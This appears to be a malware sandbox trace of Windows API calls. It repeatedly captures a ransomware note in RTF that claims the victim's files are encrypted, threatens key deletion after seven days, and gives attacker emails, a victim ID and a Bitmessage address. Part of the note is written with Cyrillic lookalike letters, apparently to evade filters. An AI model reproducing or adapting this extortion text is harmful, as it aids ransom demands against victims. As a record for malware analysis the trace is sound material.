bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.668] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0301.668] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 